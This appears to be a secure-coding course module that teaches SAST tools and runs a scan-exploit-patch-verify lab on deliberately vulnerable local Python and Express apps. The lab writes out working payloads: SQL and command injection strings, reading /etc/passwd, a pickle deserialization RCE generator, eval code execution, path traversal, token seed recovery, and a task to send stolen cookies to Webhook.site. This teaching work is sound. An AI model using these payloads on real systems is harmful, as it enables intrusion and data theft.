Source Code Vulnerability Management

Objectives: By the end of this topic, you will be able to…

  • Detect common vulnerabilities in real source code
  • Use static analysis tools to automate code review
  • Apply critical thinking to interpret and validate findings
  • Exploit confirmed vulnerabilities to demonstrate their real-world impact
  • Propose secure improvements to the code and verify they eliminate the attack vector

What is a vulnerability in code?

A source code vulnerability is a weakness in the logic or implementation of software that can be exploited to compromise its confidentiality, integrity, or availability. These flaws may allow an attacker to execute malicious code, access sensitive information, or alter the system’s behavior.


Main causes of vulnerabilities

Logical errors occur when the program’s logic does not account for all scenarios — for example, checking that a user is authenticated but not verifying their role before performing a sensitive action. These flaws require careful reading of intent and are often missed by automated tools.
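A minimal sketch of this kind of logic error follows. The `User` class and both `delete_account_*` functions are hypothetical names invented for illustration and are not part of any lab file. The first version checks only that the caller is logged in; the second checks the role as well.

```python
from dataclasses import dataclass


@dataclass
class User:
    # Hypothetical user model, for illustration only
    name: str
    is_authenticated: bool
    role: str  # e.g. "admin" or "member"


def delete_account_flawed(requester: User, target: str) -> str:
    # Logic error: any authenticated user passes this check
    if not requester.is_authenticated:
        raise PermissionError("Login required")
    return f"deleted {target}"


def delete_account_fixed(requester: User, target: str) -> str:
    # Authentication and authorization are checked separately
    if not requester.is_authenticated:
        raise PermissionError("Login required")
    if requester.role != "admin":
        raise PermissionError("Admin role required")
    return f"deleted {target}"
```

Both versions look reasonable line by line, which is why a pattern-matching scanner is unlikely to flag the first one: the flaw is a missing check, not a dangerous call.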

Lack of input validation allows uncontrolled user data to reach critical functions, causing injections, logic failures, or leaks. The most common example is constructing SQL queries by concatenating strings:

# Vulnerable: attacker supplies username = "' OR '1'='1" to dump the whole table
query = "SELECT * FROM users WHERE username = '" + username + "'"
cursor.execute(query)
 
# Safe: parameterized query — the database never interprets user input as SQL
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))

Use of insecure functions introduces risk because some standard library functions perform no bounds checking. The classic case in C is strcpy, which writes until it hits a null byte regardless of the destination buffer size:

/* Vulnerable: overwrites adjacent memory if src is longer than 63 chars */
char dest[64];
strcpy(dest, src);
 
/* Safer: copies at most sizeof(dest) - 1 bytes; strncpy adds no null byte when it truncates, so terminate explicitly */
strncpy(dest, src, sizeof(dest) - 1);
dest[sizeof(dest) - 1] = '\0';

Insecure credential management exposes secrets by embedding them directly in source code, where they end up in version control and are visible to anyone with repository access:

# Vulnerable: secret committed to the repository
DB_PASSWORD = "hunter2"
 
# Safe: read from the environment at runtime — never stored in code
import os
DB_PASSWORD = os.environ.get("DB_PASSWORD")

Access control errors arise when code confuses authentication (confirming who the user is) with authorization (confirming what they are allowed to do). A common mistake is fetching a resource by a user-supplied ID without checking that the requester owns it:

# Vulnerable: any logged-in user can read any record by guessing its ID
def get_record(user_id, record_id):
    return db.query("SELECT * FROM records WHERE id = ?", (record_id,))
 
# Safe: verify ownership before returning data
def get_record(user_id, record_id):
    record = db.query("SELECT * FROM records WHERE id = ?", (record_id,))
    # Treat "missing" and "not yours" alike so record IDs cannot be enumerated
    if record is None or record.owner_id != user_id:
        raise PermissionError("Access denied")
    return record

Relevant OWASP Top 10 categories

The OWASP Top 10 (2021 edition, whose numbering is used here) lists the most critical web application security risks. The categories most closely related to source code are:

Category | Description | Example
A01: Broken Access Control | Unauthorized access to functions or data | IDOR (Insecure Direct Object Reference)
A03: Injection | SQL, OS command, or other injection | Unvalidated input concatenated into a SQL query
A07: Identification and Authentication Failures | Authentication or session management failures | Token reuse, weak passwords
A08: Software and Data Integrity Failures | Using code or dependencies without integrity verification | Libraries installed without hash checks
A09: Security Logging and Monitoring Failures | Not logging relevant events | Ongoing attacks go undetected
A10: Server-Side Request Forgery (SSRF) | User-controlled destination in outbound requests | Internal network scanning

Static vs dynamic analysis

SAST (Static Application Security Testing)

SAST is performed without executing the program — it examines source or binary code directly, looking for risky patterns such as injections, information leaks, input validation errors, and insecure functions. Its main advantage is that it integrates naturally into CI/CD pipelines, catching flaws early when remediation is cheap. Its limitation is that it can generate false positives and cannot verify behavior that only emerges at runtime.
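To make "looking for risky patterns without executing the program" concrete, here is a toy checker built on Python's standard `ast` module. It is a sketch of the general idea only, not how Bandit or Semgrep are implemented; `RISKY_CALLS` and `find_risky_calls` are names made up for this example.

```python
import ast

RISKY_CALLS = {"eval", "exec"}  # illustrative rule set, far smaller than a real tool's


def find_risky_calls(source: str) -> list[tuple[int, str]]:
    """Return (line, name) for each direct call to a risky builtin."""
    findings = []
    # The source is parsed into a syntax tree; it is never run
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in RISKY_CALLS:
                findings.append((node.lineno, node.func.id))
    return sorted(findings)


sample = "x = input()\nprint(eval(x))\n"
print(find_risky_calls(sample))  # [(2, 'eval')]
```

The checker flags every `eval` call, including ones that only ever receive constants. That is the false-positive problem in miniature: a pattern match says where to look, not whether untrusted input reaches that line.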

Dynamic analysis (DAST or IAST)

Dynamic analysis runs the application and observes its actual behavior — making it useful for detecting vulnerabilities that only manifest at runtime, such as race conditions or logic flaws that depend on application state. It complements static analysis rather than replacing it.


SAST tools

Tool | Language | Description
Bandit | Python | Reviews code for insecure practices
Semgrep | Multi-language | Lightweight, customizable pattern detection
Flawfinder | C/C++ | Classic tool for insecure function detection
SonarQube | Multi-language | Supports custom rules, quality + security
CodeQL | Multi-language | Complex pattern queries on code (GitHub)
Brakeman | Ruby on Rails | Analysis for Rails applications
ESLint + Security Plugins | JavaScript/TypeScript | Security-focused linting

These tools are often integrated into CI/CD pipelines to automatically scan code on each commit or pull request.


Interpreting and validating findings

Not all findings represent a real risk: the first step is to prioritize by severity and context, evaluating whether the vulnerable code is actually reachable by untrusted input. Next, assess reproducibility — can the finding be exploited, and under what conditions? Tracing the data flow from input to the vulnerable function helps confirm whether validation is truly absent. When a genuine flaw is confirmed, apply secure coding principles to fix it without breaking surrounding logic. Finally, document every finding thoroughly so it can be reviewed, corrected, and used as a learning reference by the team.
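One possible way to keep triage notes in a structured form is sketched below. The `Finding` record and `triage` function are hypothetical, and the sample entries (rule IDs paired with line numbers, severities, and notes) are invented for illustration rather than taken from a real report.

```python
from dataclasses import dataclass

SEVERITY_RANK = {"HIGH": 0, "MEDIUM": 1, "LOW": 2}


@dataclass
class Finding:
    rule_id: str
    line: int
    severity: str
    reachable: bool  # can untrusted input reach this line?
    notes: str = ""


def triage(findings: list[Finding]) -> list[Finding]:
    # Reachable findings first, then by severity, then by line number
    return sorted(
        findings,
        key=lambda f: (not f.reachable, SEVERITY_RANK[f.severity], f.line),
    )


findings = [
    Finding("B105", 12, "LOW", reachable=False, notes="hardcoded password string"),
    Finding("B307", 48, "MEDIUM", reachable=True, notes="eval on user input"),
    Finding("B602", 31, "HIGH", reachable=True, notes="shell=True with user input"),
]
for f in triage(findings):
    print(f.rule_id, f.severity, f.line)
```

Sorting on reachability before severity reflects the point made above: a HIGH finding in dead code may matter less than a MEDIUM one sitting directly behind a user prompt.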


Hands-on lab

Requirements: Kali Linux, bandit, semgrep, Node.js

Part 0: Setting up the lab

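# Install pipx and make sure its bin directory is on PATH
sudo apt update && sudo apt install -y pipx
pipx ensurepath
 
# Install scanner tools (one package per command works on every pipx version)
pipx install bandit
pipx install semgrep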

Create a Semgrep account at semgrep.dev using your GitHub account.

Part 1: Python CLI tool

You are given insecure_script.py, a small Python backend utility. Your workflow for this part is: scan → exploit → patch → verify.

Step 1 — Scan. Run Bandit and save the full report:

bandit -r insecure_script.py 2>&1 | tee bandit_before.txt

For every HIGH and MEDIUM severity finding, record the line number, the Bandit rule ID, and what you think the risk is — before reading the code in depth.

Step 2 — Exploit. Run the script and work through each prompt. Do not change any code yet. Your goal is to confirm which findings represent real, triggerable vulnerabilities.

python3 insecure_script.py

User lookup — SQL injection: At the username prompt, enter ' OR '1'='1' --. Count the records returned and compare them to what a legitimate user should see. What did the injected condition do to the WHERE clause?
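The effect of that payload can be reproduced in isolation with an in-memory SQLite database. This is a standalone sketch: the table layout and sample rows are assumptions and do not mirror insecure_script.py.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("alice", "alice@example.com"), ("bob", "bob@example.com")],
)

payload = "' OR '1'='1' --"

# Concatenation: the payload becomes part of the SQL text
unsafe_sql = "SELECT * FROM users WHERE username = '" + payload + "'"
unsafe_rows = conn.execute(unsafe_sql).fetchall()

# Parameterized: the payload is compared as a literal string
safe_rows = conn.execute(
    "SELECT * FROM users WHERE username = ?", (payload,)
).fetchall()

print(len(unsafe_rows), len(safe_rows))  # 2 0
```

Printing `unsafe_sql` shows the rewritten statement: the quote closes the string early, `OR '1'='1'` makes the condition true for every row, and `--` comments out the leftover quote.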

Network ping — command injection: Enter 127.0.0.1; whoami at the host prompt. The semicolon ends the ping command and starts a new shell command. Then try 127.0.0.1; cat /etc/passwd to read a system file. Screenshot the output.
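For comparison, a hedged sketch of a ping helper that does not go through a shell. `validate_host` and `ping` are hypothetical names, and restricting input to literal IP addresses is an assumption made for this example; a tool that must accept hostnames would need a different allow-list.

```python
import ipaddress
import subprocess


def validate_host(host: str) -> str:
    """Accept only a literal IPv4/IPv6 address; raise ValueError otherwise."""
    return str(ipaddress.ip_address(host.strip()))


def ping(host: str) -> str:
    target = validate_host(host)
    # Argument list, no shell: ";" and "|" are never interpreted
    result = subprocess.run(
        ["ping", "-c", "1", target],
        capture_output=True,
        text=True,
        timeout=10,
        check=False,
    )
    return result.stdout
```

With this version, `127.0.0.1; whoami` is rejected by `validate_host` before any process starts. Even without the validation step, passing a list means the whole string would reach `ping` as one argument instead of being split by a shell.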

Calculator — arbitrary code execution via eval: Enter __import__('os').system('id'). The function receives your input as a string and executes it as Python code. Record what the output reveals about the process running the script.
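By contrast, `ast.literal_eval` parses literals only and refuses anything that would require execution. The wrapper below is a small sketch; `parse_literal` is a hypothetical helper name.

```python
import ast


def parse_literal(text: str):
    """Parse a Python literal (number, string, list, dict, ...) without executing code."""
    try:
        return ast.literal_eval(text)
    except (ValueError, SyntaxError):
        raise ValueError("Only literal values are accepted") from None


print(parse_literal("[1, 2, 3]"))  # [1, 2, 3]
```

Passing the `__import__('os').system('id')` payload to `parse_literal` raises `ValueError` instead of running a command. Note that `literal_eval` is not a calculator: it parses values, so a real arithmetic feature needs a dedicated expression parser.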

Session loader — pickle deserialization RCE: Pickle can encode arbitrary Python objects, including ones that run a system command when deserialized. In a separate terminal, generate a malicious payload:

python3 -c "
import pickle, os, base64
 
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('id',))
 
print(base64.b64encode(pickle.dumps(Exploit())).decode())
"

Paste the output at the session loader prompt and observe the command execute before load_session returns.
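A sketch of the same round trip using JSON instead of pickle, assuming the session arrives as a base64 string as in the payload generator above. `dump_session` and `load_session_safe` are hypothetical names, not functions from the lab script.

```python
import base64
import json


def dump_session(session: dict) -> str:
    return base64.b64encode(json.dumps(session).encode()).decode()


def load_session_safe(blob: str) -> dict:
    """Decode a base64 JSON session; JSON can only yield plain data types."""
    data = json.loads(base64.b64decode(blob))
    if not isinstance(data, dict):
        raise ValueError("Session must be a JSON object")
    return data


blob = dump_session({"user": "alice", "role": "member"})
print(load_session_safe(blob))
```

JSON decoding can only produce dictionaries, lists, strings, numbers, booleans, and null, so there is no equivalent of `__reduce__` for an attacker to hook. A pickle payload pasted into this loader fails to parse and raises a `ValueError` subclass.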

One-time tokens — insecure randomness: The script prints five tokens generated by random.randint. Note the approximate time. Then run the following to reproduce the same sequence:

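python3 -c "
import random, time
now = int(time.time())
# Try every one-second seed from the last five minutes; look for the row matching the tokens printed by the script
for seed in range(now - 300, now + 1):
    random.seed(seed)
    print(seed, [random.randint(100000, 999999) for _ in range(5)])
"

This search succeeds only if the script seeds the generator from the clock, for example with random.seed(int(time.time())), and draws the tokens immediately after seeding. In that case an attacker who knows the approximate generation time can predict every token issued from that seed. By default Python seeds random from operating-system entropy, but its Mersenne Twister generator is still not cryptographically secure: its internal state can be reconstructed from enough observed outputs, so it should never be used for security tokens.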
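A short sketch of token generation with the standard `secrets` module, which draws from the operating system's cryptographic random source. The function names are hypothetical, and the six-digit range simply mirrors the `randint(100000, 999999)` call above.

```python
import secrets


def one_time_token() -> str:
    """Six-digit token in the range 100000 to 999999."""
    return str(100000 + secrets.randbelow(900000))


def url_token() -> str:
    """64 hex characters (32 random bytes), e.g. for reset links."""
    return secrets.token_hex(32)


print(one_time_token(), url_token())
```

There is no seed to guess here, so knowing the generation time gives an attacker nothing. A six-digit code still has only 900,000 possible values, so rate limiting and expiry remain necessary.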

Hardcoded credentials — static finding: The remaining Bandit findings flag constants assigned at module level. No runtime interaction is needed — their presence in the source file means they will appear in every git commit, log, and deployment artefact. Document what each credential controls and what an attacker could do with it.

Step 3 — Patch. Fix every HIGH and MEDIUM finding. Use the table below as a guide, then write the secure version yourself:

Vulnerability | Secure pattern
SQL injection | Parameterized queries: cursor.execute(query, (param,))
Command injection | Pass arguments as a list, no shell=True: subprocess.check_output(["ping", "-c", "1", host])
eval / exec | Remove or replace; use ast.literal_eval only for safe literal parsing
Pickle deserialization | Use json for untrusted data
Hardcoded credentials | os.environ.get("VAR_NAME"); never store secrets in source code
Weak password hash | bcrypt or argon2 for passwords; hashlib.sha256 for non-secret digests
Insecure random | secrets.token_hex() or secrets.randbelow() for security-sensitive values

Add a short comment to every line you change explaining what you fixed and why.
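The table recommends bcrypt or argon2 for passwords; both are third-party packages. As a standard-library stand-in, the sketch below uses PBKDF2 from `hashlib`, which is a different algorithm swapped in here only so the example runs without extra installs. The function names and the iteration count are assumptions to adapt to your own environment.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumption: tune to your hardware and current guidance


def hash_password(password: str) -> tuple[bytes, bytes]:
    """Return (salt, digest) using a fresh random salt per password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # Constant-time comparison avoids leaking how many bytes matched
    return hmac.compare_digest(digest, expected)
```

The design points carry over to bcrypt and argon2: a unique salt per password, a deliberately slow derivation, and a constant-time comparison when verifying.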

Step 4 — Verify. Rerun Bandit — it should report zero HIGH or MEDIUM findings. Then rerun the script and attempt each exploit again. Every attack should now either raise an error or produce no useful output.

bandit -r insecure_script.py 2>&1 | tee bandit_after.txt
python3 insecure_script.py

Reflection question: Which finding was hardest to exploit, and which was hardest to patch correctly? Did exploiting them change the order in which you prioritized the fixes?


Part 2: Node.js web application

You are given a small Express application in nodejs-app/. Your workflow is the same: scan → exploit → patch → verify.

Step 1 — Deploy and scan.

cd nodejs-app
npm install
npm start &    # runs on http://localhost:3000
semgrep --config=auto app.js 2>&1 | tee semgrep_before.txt

For each Semgrep finding, record the line, the rule ID, the affected endpoint, and your hypothesis about how it could be exploited.

Step 2 — Exploit. With the server running, attack every endpoint. Screenshot or save the output of each successful exploit before changing any code.

Hardcoded secrets — static finding: Locate the constants Semgrep flags near the top of app.js. Describe what an attacker who reads the source (or who obtains a leaked build artefact) could do with each value.

Reflected XSS — GET /hello: Open a browser and navigate to:

http://localhost:3000/hello?name=<script>alert(document.cookie)</script>

Observe the script execute. Now craft a payload that exfiltrates the page’s cookies to an external endpoint — use Webhook.site to receive the request and confirm the data arrived.
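The lab application is JavaScript, but the escaping idea is language-independent. To stay in the same language as Part 1, here is a Python sketch using the standard `html` module; `render_greeting` is a hypothetical stand-in for the /hello handler, not the application's actual code.

```python
import html


def render_greeting(name: str) -> str:
    # html.escape turns <, >, &, and quotes into entities
    return f"<h1>Hello, {html.escape(name)}!</h1>"


print(render_greeting("<script>alert(document.cookie)</script>"))
# <h1>Hello, &lt;script&gt;alert(document.cookie)&lt;/script&gt;!</h1>
```

The browser now displays the payload as text instead of parsing it as a script element. Escaping must match the output context: this covers HTML body text, while values placed inside attributes, URLs, or inline scripts need context-specific encoding.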

SQL injection — GET /user:

# Return every row in the users table
curl -G --data-urlencode "username=' OR '1'='1" http://localhost:3000/user
 
# Target the admin record specifically
curl -G --data-urlencode "username=admin'--" http://localhost:3000/user

Compare what you receive to what the endpoint is supposed to return for a normal request.

Path traversal — GET /file:

curl -G --data-urlencode "name=../../../../etc/passwd" http://localhost:3000/file
curl -G --data-urlencode "name=../../../../etc/hostname" http://localhost:3000/file

How far outside the intended directory can you navigate? What limits you?
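The containment check that defeats this attack can be sketched in Python with `pathlib` (Python 3.9 or later for `is_relative_to`). `BASE_DIR` and `safe_path` are hypothetical; the Node.js application would apply the same idea with its own path utilities.

```python
from pathlib import Path

BASE_DIR = Path("/srv/app/files")  # hypothetical allowed directory


def safe_path(name: str) -> Path:
    # Resolve ".." segments and symlinks first, then check containment
    candidate = (BASE_DIR / name).resolve()
    if not candidate.is_relative_to(BASE_DIR.resolve()):
        raise PermissionError("Path escapes the allowed directory")
    return candidate
```

Checking containment after resolution is the important part. Filtering out `../` in the raw string is fragile, and a plain string-prefix test would wrongly accept a sibling directory such as `/srv/app/files-private`.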

Command injection — GET /ping:

curl -G --data-urlencode "host=127.0.0.1; id" http://localhost:3000/ping
curl -G --data-urlencode "host=127.0.0.1; cat /etc/passwd" http://localhost:3000/ping

IDOR — GET /note:

curl "http://localhost:3000/note?id=1"

No authentication is required. What does this mean for a multi-user application where notes are supposed to be private?

Credentials in URL — GET /login:

curl "http://localhost:3000/login?username=admin&password=admin123"

Switch to the terminal running npm start and find the request in the access log. Explain why GET parameters are a poor choice for credentials even when HTTPS is in use.

eval RCE — GET /calc:

curl -G --data-urlencode "expr=require('child_process').execSync('id').toString()" http://localhost:3000/calc
curl -G --data-urlencode "expr=require('fs').readFileSync('/etc/passwd','utf8')" http://localhost:3000/calc

Missing security headers:

curl -I http://localhost:3000/hello

Note which headers are absent. Look up what each missing header protects against and how the reflected XSS exploit from earlier could be partially mitigated by a correct Content-Security-Policy.

Step 3 — Patch. Fix every finding in app.js:

Vulnerability | Secure pattern
Hardcoded secrets | process.env.VAR_NAME; document required variables in a .env.example file
Reflected XSS | Escape user input before inserting it into HTML; add a Content-Security-Policy header
SQL injection | Parameterized queries using ? placeholders: db.get(query, [param], callback)
Path traversal | path.resolve() the final path and assert it equals the allowed directory or starts with it followed by path.sep (a bare prefix check also matches sibling directories)
Command injection | Use execFile with an argument array instead of exec with a shell string
IDOR | Require authentication; verify the authenticated user owns the requested resource
Credentials in URL | Accept credentials via POST body only; never read passwords from query parameters
eval RCE | Remove the endpoint; if a calculator is needed, use a safe math parser library
Missing headers | app.use(require('helmet')()) as the first middleware

Step 4 — Verify. Stop the server, restart with the patched code, and rerun Semgrep:

pkill -f "node app.js"
npm start &
semgrep --config=auto app.js 2>&1 | tee semgrep_after.txt

Rerun every curl command and browser request from Step 2. Each attack must either be rejected with an appropriate error or return sanitized output. Capture a screenshot for each one.

Reflection question: Which vulnerability in the web application had the largest gap between how simple it was to exploit and how much damage it could cause in a real deployment? How did your answer change after you ran the exploit versus when you only read the Semgrep finding?

Cleanup

pkill -f "node app.js"

Submission

Compressed folder including:

  • bandit_before.txt and bandit_after.txt
  • semgrep_before.txt and semgrep_after.txt
  • Terminal output or screenshots for every successful exploit (before patching)
  • Patched insecure_script.py and app.js with explanatory comments on every changed line
  • Written reflection (max. 1 page): which vulnerability surprised you most once you exploited it, and why

Key concepts

Term | Definition
SAST | Source code analysis without executing the application
Vulnerability | Exploitable weakness in a system or application
SQLi | Injection of malicious SQL code into input fields
XSS | Injection of malicious scripts into web pages
Bandit | SAST tool for Python code
Semgrep | Multi-language and customizable static analyzer
OWASP Top 10 | List of the ten most critical web vulnerabilities
